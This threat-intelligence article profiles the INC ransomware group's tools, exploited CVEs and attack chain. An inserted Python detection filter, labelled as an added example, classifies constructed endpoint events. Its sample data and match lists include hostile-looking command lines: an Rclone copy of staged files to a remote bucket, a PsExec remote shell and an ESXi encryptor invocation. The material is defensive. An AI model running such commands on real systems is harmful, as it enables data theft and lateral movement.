Cybersecurity researchers have observed the rapid evolution of the INC ransomware group, transforming from a nascent ransomware-as-a-service (RaaS) operation into one of the most prolific cybercrime entities by 2026. Since August 2023, INC has claimed over 830 victims, with a significant majority targeting organizations in the United States across critical sectors like legal services, manufacturing, construction, technology, and healthcare.
The disruption of major ransomware operations, notably LockBit and BlackCat, created a fertile ground for INC to expand its reach. Affiliates seeking new avenues for their illicit activities have migrated to alternative ransomware platforms, including INC, contributing to its accelerated growth. This influx has bolstered INC’s capabilities and reach, making it a prominent threat in the current cybersecurity landscape.
INC Ransomware: A Growing Threat Landscape
INC’s technical advancements have played a crucial role in its ascendance. The group has rewritten its Windows and Linux/ESXi encryptors in Rust, a modern programming language known for its performance and security features. This strategic move facilitates easier cross-platform development and significantly enhances resistance to reverse engineering attempts, making it harder for security professionals to analyze and counteract the malware.
Furthermore, INC has introduced an updated credential dumper capable of targeting newer Veeam backup deployments that utilize salted DPAPI credential encryption. This allows attackers to more effectively pilfer credentials from critical backup systems, thereby broadening their access and potential for disruption. The group’s adaptable infrastructure and evolving toolkit underscore its commitment to maintaining a sophisticated and persistent threat.
The proliferation of INC’s ransomware variants has also been evident in the cybercrime underground. The sale of its Windows and Linux versions in May 2024 has led to the emergence of related ransomware families, such as Lynx and Sinobi, which exhibit significant code overlap with INC’s original strain. This indicates a potential for code sharing and collaboration within the cybercriminal ecosystem, further complicating efforts to track and mitigate these evolving threats.
INC ransomware affiliates are known for their diverse range of tools and techniques. In recent campaigns, they have consistently targeted unpatched edge devices for initial access, a common entry point for many cyberattacks. After gaining a foothold, they often target Veeam backup servers to dump credentials, which are then used to move laterally through victim networks. For this lateral movement, they employ a mix of Living-off-the-Land binaries (LOLBins)—legitimate system tools used for malicious purposes—and commercial Remote Monitoring and Management (RMM) tools, demonstrating a flexible and opportunistic approach to network infiltration.
The INC Attack Chain: A Detailed Look
The double extortion strategy employed by INC involves a multi-stage attack chain. Organizations are initially compromised through various methods, including sophisticated spear-phishing campaigns, the acquisition of stolen account credentials from illicit marketplaces, and the exploitation of vulnerabilities in publicly accessible applications. Notable vulnerabilities exploited include those in Citrix NetScaler (CVE-2023-3519 and CVE-2025-5777), Fortinet EMS (CVE-2023-48788), and SimpleHelp (CVE-2024-57727).
Once initial access is secured, the attackers focus on extracting sensitive credentials from the compromised environment. They leverage LOLBins like Remote Desktop Protocol (RDP) and PsExec to facilitate lateral movement across the network, seeking out valuable data and critical systems. The “Bring Your Own Vulnerable Driver” (BYOVD) technique, using drivers like filwfp.sys, filnk.sys, and fildds.sys, is also employed to disable or impair system defenses, weakening the victim’s security posture.
For command-and-control (C2) infrastructure, INC affiliates utilize a range of tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer. These legitimate remote access tools are often misused for malicious C2 communication, making them difficult to distinguish from normal network traffic. Data exfiltration is typically carried out using Rclone after sensitive information is staged and compressed into password-protected archives. This stage is critical for the double extortion aspect, as stolen data is often held ransom or leaked if the primary ransom payment is not met.
Finally, the encryption phase commences using the INC encryptor. The ransomware employs techniques like multithreading and partial encryption to accelerate the data locking process. The payload features a command-line interface, granting operators granular control during hands-on deployments. Notably, when executed with the “--esxi” argument, the ransomware attempts to shut down virtual machines, potentially causing significant operational downtime and increasing pressure on victims to comply with ransom demands.
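As an added example, not code from the article or from INC's tooling, the following Python triage filter labels constructed endpoint telemetry with the attack-chain stages described above (BYOVD driver loads, PsExec lateral movement, unsanctioned RMM tools, Rclone staging, and the “--esxi” encryptor flag). The event field names, host names and file paths are assumptions; only the driver and tool names come from the text.

```python
# Added example, not from the article: map constructed endpoint telemetry to the
# INC attack-chain stages described above. Field names and sample values are
# constructed; only the tool and driver names come from the article.
BYOVD_DRIVERS = {"filwfp.sys", "filnk.sys", "fildds.sys"}
RMM_TOOLS = {"anydesk.exe", "screenconnect.clientservice.exe", "teamviewer.exe"}
LATERAL_TOOLS = {"psexec.exe", "psexesvc.exe"}


def classify(event: dict, sanctioned_rmm: frozenset = frozenset()):
    """Attack-chain stage an event suggests, or None. sanctioned_rmm lists RMM
    executables the organisation deploys; RMM use looks legitimate by design."""
    image = event.get("image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmdline = event.get("cmdline", "").lower()
    if event.get("type") == "driver_load":
        return "defense-evasion:byovd" if image in BYOVD_DRIVERS else None
    if event.get("type") != "process_create":
        return None
    if image in LATERAL_TOOLS:
        return "lateral-movement:psexec"
    if image in RMM_TOOLS and image not in sanctioned_rmm:
        return "c2:unsanctioned-rmm"
    if image == "rclone.exe" and {"copy", "sync", "move"} & set(cmdline.split()):
        return "exfiltration:rclone"
    if "--esxi" in cmdline.split():  # weak alone; corroborate with VM shutdowns
        return "impact:encryptor-esxi"
    return None


def triage(events: list, sanctioned_rmm: frozenset = frozenset()) -> list:
    """(host, stage) pairs in event order; benign events dropped."""
    return [(e["host"], s) for e in events if (s := classify(e, sanctioned_rmm))]


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "ws01", "type": "driver_load", "image": r"C:\Windows\Temp\filwfp.sys"},
    {"host": "ws01", "type": "process_create", "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"psexec.exe \\srv02 -s cmd.exe"},
    {"host": "srv02", "type": "process_create", "image": r"C:\TV\TeamViewer.exe",
     "cmdline": "teamviewer.exe"},
    {"host": "srv02", "type": "process_create", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy D:\staging remote:bucket"},
    {"host": "esxi01", "type": "process_create", "image": "/tmp/enc",
     "cmdline": "/tmp/enc --esxi"},
    {"host": "ws01", "type": "process_create", "image": r"C:\Windows\notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for host, stage in triage(SAMPLE_EVENTS, frozenset({"teamviewer.exe"})):
        print(f"{host}: {stage}")
```

With TeamViewer listed as sanctioned, the run flags the driver load, the PsExec hop, the Rclone copy and the ESXi encryptor invocation but not the RMM session; without the allowlist the TeamViewer start is also reported.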
The success of ransomware groups like INC highlights that advanced tradecraft or bespoke tooling may not always be necessary for achieving significant scale and impact. By efficiently leveraging widely known techniques and readily available tools, these groups can consistently generate victims across diverse geographies and sectors. Data from ZeroFox indicates that INC ransomware emerged as the fourth most prominent ransomware group in Q1 2026, responsible for over 120 incidents during that period, following other notable groups like Qilin, Akira, and The Gentlemen.
INC’s continued strengthening of its ransomware operations through Rust-based payload rewrites and continuous toolkit enhancements poses an ongoing threat. The group’s strategic targeting of industries such as healthcare, legal services, professional services, manufacturing, and construction is particularly effective, as operational downtime in these sectors creates immense financial pressure to pay ransoms. This threat is amplified by the interconnected nature of these industries, where reliance on uninterrupted operations and supply chains increases the risk of collateral exposure across vendor networks and downstream partners in the event of a breach.
Moving forward, cybersecurity professionals must remain vigilant, focusing on promptly patching known vulnerabilities, strengthening credential management practices, and implementing robust backup and recovery solutions. The ongoing evolution of INC and similar ransomware groups underscores the need for continuous adaptation and proactive defense strategies in the face of an ever-changing threat landscape.